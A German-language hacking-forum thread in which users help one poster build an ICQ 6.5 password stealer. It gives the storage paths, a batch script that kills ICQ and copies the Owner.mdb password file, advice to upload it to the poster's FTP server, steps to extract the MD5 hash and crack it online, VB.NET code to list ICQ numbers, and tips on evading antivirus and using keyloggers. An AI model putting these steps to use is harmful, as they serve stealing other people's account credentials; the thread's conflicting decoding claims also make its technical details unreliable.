Hallo liebe community weoß jemand von euch vllt wo icq6.5 die icq nummer und das pw speichert?

und wie es verschlüßelt ist???


Kann mann die daten in der registry finden??

Hallo liebe community weoß jemand von euch vllt wo icq6.5 die icq nummer und das pw speichert?

und wie es verschlüßelt ist???


Kann mann die daten in der registry finden??

Hier findest du die nummern (immer)

C:\Documents and Settings\Administrator\My Documents\ICQ

PW; kA

MfG MH

Hier findest du die nummern (immer)

C:\Documents and Settings\Administrator\My Documents\ICQ

PW; kA

MfG MH



Und wie lese ich die icq nummer aus???
brauche das für mein stealer kann ja nicht meine daten eingeben

Weiß auch nciht genau, wo das gespeichert ist, aber am besten lädst du den ganzen Ordner hoch, wie oben erwähnt.

Unter Vista ist der Pfad C:\Users\USERNAME\AppData\Roaming\ICQ\DEINE_NUMMER \Owner.mdb
In der Owner.mdb werden deine Pw's die du zum Login benutzt gespeichert

Hier das kannst du in batch schreiben z.B so

cd C:\
cd %userprofile%
tskill /a ICQ
cd Anwendungsdaten
cd ICQ
cd 2*
cd 3*
cd 4*
cd 5*
tskill /a ICQ
copy Owner.mdb "C:\Programme\"


Dann Kopiert er die Datei in dem die pws drin sind nach C:\Programme und dann kannst du ja ein Prog machen das die dateien auf dein ftp uloadet its very easy und das wars für so nenn stealer bracuht mann weniger als 2 min ^^ und wenn du die datein hast must du noch den md5 hash auslesen "ICQ 6 Password Hasher" damit bekommst du ihn raus und dann einfach hash im inet rausfinden z.b unter der seite http://hashkiller.com/

Weiß auch nciht genau, wo das gespeichert ist, aber am besten lädst du den ganzen Ordner hoch, wie oben erwähnt.

WoW hat ja voll einen Sinn -.-

1#
Einfach Stealer drauf, wenn du ihn noch in PI oder Bifi hast, fertig, wenns nicht klappt, da er vllt ein Anti Vir hat, einfach warten bis der weg ist, anti vir ausmachen fertig.

2# Einfach "Ordner" Löschen, dann musst der die nummer nochmal eingeben & password, Keylogger Refresh fertig.


MfG MH

Weiß auch nciht genau, wo das gespeichert ist, aber am besten lädst du den ganzen Ordner hoch, wie oben erwähnt.


Probiere mal die idee mit der batch


Weiß jemand wie ich die icq nummer rausbekomme in vb.net

Achso, dachte du willst alle Profile haben. Weil dann ist das am ienfachsten, wenn du einfach den Ordner hochlädst und dann die einzelnen PWs ausliest.

Probiere mal die idee mit der batch


Weiß jemand wie ich die icq nummer rausbekomme in vb.net

Ohh man ....

C:\Documents and Settings\Administrator\My Documents\ICQ

Geh da mal bei DIR rein.
Und dann siehste selber, dass die ICQ NUMMERN DA STEHEN....

MfG MH

Mit einer DirectoryInfo die Ordner die in "C:\Documents and Settings\Administrator\My Documents\ICQ" sind durchlaufen , am besten mit einer for Each schleife.
Innerhalb der schleife prüfst du ab , ob der aktuelle Ordner mit einer zahl anfängt , und am besten wie lang der Name des aktuellen Ordners ist.

So kannst du Prüfen ob es sich um eine ICQ Nummer handelt , dann kannst du die nummern ja in eine Textdatei speichern.
Gibt aber sicher elegantere Methoden um die Problematik zu Lösen.

MfG

hab gerade die owner.mdb in einer listbox geladen da k0ommt ja nur kauderwelch raus habe gerade gelesen das man den inhalt derr owner mdb in uint64 konvertieren muß weiß jemand wie ich den listbox inhalt in uint 64 convertiert bekomme


Habe es mit ListBox1.Items = Convert.toUint64 versucht aber dfas geht nicht




hab das it der batch probiert funktioniert iwie nicht

Das Passwort liegt hinter Storage passwort in der ownder.mdb
Als erstes musst du es base64 decoden , dann in Hex umwandeln und die ersten 32 Zeichen nehmen.Dann hasste den MD5 Hash.

Infos sind von Krusty ;)

Das Passwort liegt hinter Storage passwort in der ownder.mdb
Als erstes musst du es base64 decoden , dann in Hex umwandeln und die ersten 32 Zeichen nehmen.Dann hasste den MD5 Hash.

Infos sind von Krusty ;)


habe das ganze jetzt in base 64 konvertiert wie mache ich daraus jetztb den md5? besser gesagt wie wandel ich das jetzt in hex um?

hier was kleines von mir, wie du die icq-nummern des rechners ermitteln kannst :)



Dim nrfolder As String = "C:\Documents and Settings\Administrator\My Documents\ICQ"
Dim sFiles() As String = System.IO.Directory.GetFiles(nrfolder)
Dim sDirs() As String = System.IO.Directory.GetDirectories(nrfolder)

For Each ordner As String In sDirs
TextBox1.Text &= System.IO.Path.GetFileName(ordner) & vbCrLf
Next

@br00_pwn

Ich will nicht Klugscheißern , aber Pfade sollte man nicht Hardcoden , sondern immer Dynamisch ermitteln ;)

MfG

Klugscheißer ;)

hier was kleines von mir, wie du die icq-nummern des rechners ermitteln kannst :)



Dim nrfolder As String = "C:\Documents and Settings\Administrator\My Documents\ICQ"
Dim sFiles() As String = System.IO.Directory.GetFiles(nrfolder)
Dim sDirs() As String = System.IO.Directory.GetDirectories(nrfolder)

For Each ordner As String In sDirs
TextBox1.Text &= System.IO.Path.GetFileName(ordner) & vbCrLf
Next


Das sieht doch schonmal geil aus

Jetzt bleibt nurnoch die frage offen wie ich die base 64 in hex bekomme

Das Passwort liegt hinter Storage passwort in der ownder.mdb
Als erstes musst du es base64 decoden , dann in Hex umwandeln und die ersten 32 Zeichen nehmen.Dann hasste den MD5 Hash.

Infos sind von Krusty ;)


SOa .. da mir ja im ICQ thread keiner Antwortet poste ihc hier


was willst du denn Bitte in der Owner.mdb (die wird btw vorne große geschrieben) base64 decoden? Die ist erstmal komplett in deutsch wenn du die lädts ... schau dir bitte noch mal meinen Thread an inmate: http://free-hack.com/showthread.php?t=44974

... ich brauche HILFE :D ich bin so kurz vor der Lösung stealer bis jetzt fud und alles funzt :D nur das essentielle das md5 raussuchen im Controll panel das läuft net :(

dann hier nochmal was, was du dir anschauen solltest :)






Imports System
Imports System.Text
Namespace ConsoleApplication1
* * Class Program
* * * * Private Shared Sub Main(ByVal args As String())
* * * * * * Dim base64String As String = "SGFsbG8gV2VsdCE="
* * * * * * Dim text As String = Base64ToString(base64String)
* * * * * * Dim hexString As String = StringToHexString(text)
* * * * End Sub
* * * *
* * * * Private Shared Function Base64ToString(ByVal base64String As String) As String
* * * * * * Dim buffer As Byte() = Convert.FromBase64String(base64String)
* * * * * * Return Encoding.[Default].GetString(buffer)
* * * * End Function
* * * *
* * * * Private Shared Function StringToHexString(ByVal inputString As String) As String
* * * * * * Dim sb As New StringBuilder()
* * * * * * For Each c As Char In inputString
* * * * * * * * sb.Append("0x")
* * * * * * * * sb.Append(Convert.ToString(c, 16))
* * * * * * * * sb.Append(" ")
* * * * * * Next
* * * * * *
* * * * * * Return sb.ToString()
* * * * End Function
* * End Class
End Namespace






Private Function EncryptString(ByVal lpString As String)
Dim local() As Byte = System.Text.Encoding.Default.GetBytes(lpString)
Return Convert.ToBase64String(local)
End Function

Private Function DecryptString(ByVal lpString As String)
Return Convert.FromBase64String(lpString)
End Function

@neochrom ich checke nicht genau was du da machst :D

Der ICQ Hash liegt hinter dem Wort Storage Passwort.
Diesen Hash müsst ihr erst mit base64 decoden und anschliessen in HEX Values umwandeln ! nicht die komplette Datei :rolleyes:
Danach nehmt ihr einfach die ersten 32 Zeichen des decodeten und in Hex umgewandelten Hash´s und ihr habt den MD5 Hash.Was ist daran so schwer zu verstehen ?

mfG

Dude -.- das ist mir alles klar der Unterschied ist das du den Fuck binär einliest und ich nen offizielen pure java engine Treiber habe und die Datei legal einlese ...

binär hab ich den Eintrag jetzt auch gefunden :(

komisch wann habe ich denn gesagt das ich den "fuck" binär einlese ?
Ich habe lediglich gesagt wie man an den MD5 Hash kommt.
Und ich weis auch nicht was das jetzt mit nem offiziell pure engine Java Treiber zu tun hat.

also ... wen du ms access am rechner hast dann doppel klick auf die Datei machst dann zeig mir mal bitte ein einer der beiden Tabellen (Weiß du was ne Datenbank ist? da gibts mehrere DBS) den Eintrag Storedpasswords oder S t o r e d p a s s w o r d ... .... So was gibts weder in der Tabelles Users noch in der Tabelle records :( leider! ....

Deswegen ka hats iwas mit dem Binär einlesen auf sich vermute ich!

mein gott wie viele threads werden denn noch damit gepostet^^
also ich werd mal einfach alles zusammfassen in der hoffnung dass das dann gegessen ist wie man ICQ PWs rausbekommt.

also:
1. das icq PW liegt in der datei: "C:\Dokumente und Einstellungen\USERNAME\Anwendungsdaten\ICQ\UNI\Own er.mdb"

2. der inhalt der datei wird mit base64 encodet

3. dann wird das mit nem hex editor geöffnet

4. irgendwo in dem zeichengewusel is dann der MD5 hash (welche zeile das genau is weiß ich jetzt nich aber lässt sich bestimt googlen)

mfg :)

danke dir das schafft klarheit =)

also die owner.mdb hab ich mir geholt demnach
1.Finished
also hab die Datei jetzt eingelesen die bytes in nen byte array gepackt .... bytes repräsentieren ja praktisch nichts anderes als Zeichen! ....also wollt ich mit String abc=new String(b);
//b= mein Byte array
das nach nem ordentlichen String konvertieren damit ichs base64decoden kann ...

rauskam etlich kylische unlesehrliche Zeichen
2.failed
trozdem hast du mir schonmal sehr weiter geholfen ... das bringt jetzt mal licht ins Dunkel was die Frage nach der reihen folge klärt ...

mfg neo
werd morgen wenn ich net kurz vorm ratzen bin den code noch mal gegen lesen!

Warum denn die komplette owner.mdb decoden ?
Es reicht den Hash zu decoden.Dann sieht er ca so aus:234abdseu2345ndfnsd2

Wenn mand den dann in Hex umwandelt sieht er so aus

3D 6H 3C 2S usw.

Dann einfach von 3D + 32 Values Zählen dann hast du den MD5 Hash.

So hab das jetzt mal gemacht:

Ist das ein md5 hash:
*1F933B02*CB3BFF9BC*CB711C46E*C6

Hab 4 Zeichen als * gemacht ^^ damit den niemand entschlüsselt oder so ^^

hashes kann man nicht entschlüssen.
stell dir vor deine password wäre 123456. der einfachste hash wäre die quersumme (21). wenn du dein password eintippst wird wieder die quersumme genommen und erst wenn sie gleich mit der alten ist ist das password richtig.
Bei so einem einfachen algorithmus würde aber zum Beispiel das Password 777 oder 669 auch richtig sein. Das nennt man Kollision. Verschiedenes Password gleicher Hash.
Deswegen würde zum Beispiel auch die Wortlänge mit berechnet. also 123456=21 und als länge 6 zeichen also 21:6.Jetzt gelten nur passwörter die 21 als quersumme haben und 6 zeichen lang sind.
Man könnte auch noch sicher gehen. also zB bei jeder Stelle wird die Hälfte der Zahl +Stelle genommen (aufgerundet). Also beim Password 987654321 9(erstes zeichen des passwords)+5(aufgerundet)+1(erste stelle)+8(erstes Zeichen)+4(die hälfte)+2(stelle)+7(..)+4(hälfte von 7)+3...
Das wäre sicher als die quersumme(der hash wäre übrigens 115). Komplizierter geht immer und vermindert das risiko von kollisonen.
Und falls du dich jetzt fragst wie das mit buchstaben geht->ascii-table

lange rede kein sinn:ja das sieht wie ein md5 hash aus.

:D:D:D

danke wacked ^^

Der letzte satz war der den ich hören wollte ;)

Na wenigstens einer checkt es xD

hm...irgendwie verstehe ich das nicht.
Also wie du sagst liegt der md5 hash unter restorepassword als hex vor.. jetzt soll man diesen hex base64 decoden. wie kann man den was decoden wenn es nicht in dem "format vorliegt?
Encodieren...Transformation von Quelle zum Ziel
Dekodieren...Transformation vom Ziel zurück zur Quelle (Umkehrung)

edit.... hab alles was ich brauche :)

für alle die es genau wissen wollen ... http://rapidshare.com/files/95431241/ICQ_6_Passhash_Decrypter_Source.rar